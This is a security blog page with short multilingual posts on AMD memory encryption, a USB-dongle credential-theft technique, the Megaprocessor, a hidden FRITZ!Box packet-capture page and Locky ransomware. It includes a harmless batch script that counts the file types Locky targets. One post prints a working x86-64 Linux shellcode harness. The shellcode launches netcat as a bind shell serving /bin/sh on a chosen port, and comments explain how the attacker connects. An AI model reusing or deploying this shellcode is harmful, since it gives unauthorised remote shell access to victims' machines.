Sep 16 10

Thomas Lendacky from the AMD introduces on the KVM Forum 2016 Secure Memory Encryption (SME) and Secure Encrypted Virtualization (SEV) features from the new Zen microarchitecture.

Find out more:

written by d45id \\ tags: , , , , , , , ,

Sep 16 08

passwdSecurity researcher Robert Fuller discovered an attack method with which Windows and Mac user credentials can be stolen from a locked machine.
This attack is affected against actual Windows and Mac OS computers on which the user has already logged in.

The researcher used USB-based Ethernet dongles like USB Armory or Hak5 Turtle , for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it’s connected to.
Find out more:

written by d45id \\ tags: , , , , , ,

Jul 16 08

James Newman from Cabridge builds his own very huge „micro“-processor called The Megaprocessor.

megaprocessor
This awesome 16bit processor is about 10m long and 2m tall has thousands of LEDs more than 40 thousands of transistors. It has 256 byte RAM and a clock rate of 20kHz!
You can find more information, videos and a couple of articles (The Register and the BBC News) about The Megaprocessor at the project page or at facebook.

written by d45id \\ tags: , , , ,

Jul 16 06

Router der Marke FRITZ!Box verfügen über einen mehr oder weniger versteckten Modus in dem sich sehr einfach und schnell Paketmitschnitte auf den einzelnen Schnittstellen erstellen und im pcap (packet capture) Format speichern lassen.

Aufrufen lässt sich das Menü über die Webschnittstelle indem die Unterseite /html/capture.html aufgerufen wird. Eine valide Benutzerkennung ist von Nöten.

Beispiel: http://192.168.178.1/html/capture.html
capturemode

written by d45id \\ tags: , , , ,

Jul 16 06

Floser Bacurio and Roland Dela Paz published an interesting article about Locky’s new anti-sandbox technique and how to crack it.

Find out more: Cracking Locky’s New Anti-Sandbox Technique

written by d45id \\ tags: , , ,

Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>
#include <string.h>
 
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
 
unsigned char code[] = \
 
#define PORT "\x39\x39"
// Keep to two bytes
 
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
 
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
 
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
 
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id \\ tags: , , , ,

Apr 16 26

Integendeel!
Mooie video over privacy en beveiligde instant messaging

written by d45id \\ tags: , , , , ,

Apr 16 26

Avec ce petit script que vous pouvez voir quel type de fichiers serait chiffré en cas d’infection par le LOCKY virus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
@echo off
setlocal enabledelayedexpansion
echo 
set total=0
cls
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (
  set DRIVE=%%i:\
  if exist !DRIVE! (
    call :lookup !DRIVE!
  )
)
echo Nombre de fichiers potentiellement affectés : %total%
pause
goto :eof
 
:lookup
set drive=%1
set subtotal=0
echo Examiner %drive%
for /r %drive% %%i in (*.mid *.wma *.flv *.mkv *.mov *.avi *.asf *.mpeg *.vob *.mpg *.wmv *.fla *.swf *.wav *.qcow2 *.vdi *.vmdk *.vmx *.gpg *.aes *.ARC *.PAQ *.tar*.bz2 *.tbk *.bak *.tar *.tgz *.rar *.zip *.djv *.djvu *.svg *.bmp *.png *.gif *.raw *.cgm *.jpeg *.jpg *.tif *.tiff *.NEF *.psd *.cmd *.bat *.class *.jar *.java *.asp *.brd *.sch *.dch *.dip *.vbs *.asm *.pas *.cpp *.php *.ldf *.mdf *.ibd *.MYI *.MYD *.frm *.odb *.dbf *.mdb *.sql *.SQLITEDB *.SQLITE3 *.asc *.lay6 *.lay *.ms11 *.sldm *.sldx *.ppsm *.ppsx *.ppam *.docb *.mml *.sxm *.otg *.odg *.uop *.potx *.potm *.pptx *.pptm *.std *.sxd *.pot *.pps *.sti *.sxi *.otp *.odp *.wks *.xltx *.xltm *.xlsx *.xlsm *.xlsb *.slk *.xlw *.xlt *.xlm *.xlc *.dif *.stc *.sxc *.ots *.ods *.hwp *.dotm *.dotx *.docm *.docx *.DOT *.max *.xml *.txt *.CSV *.uot *.RTF *.pdf *.XLS *.PPT *.stw *.sxw *.ott *.odt *.DOC *.pem *.csr *.crt *.key wallet*.dat) do (
  echo %%i
  set /a subtotal=subtotal + 1
  set /a total=total + 1
)
echo fichiers trouvés: %subtotal%
pause
goto :eof

written by d45id \\ tags: , , , , ,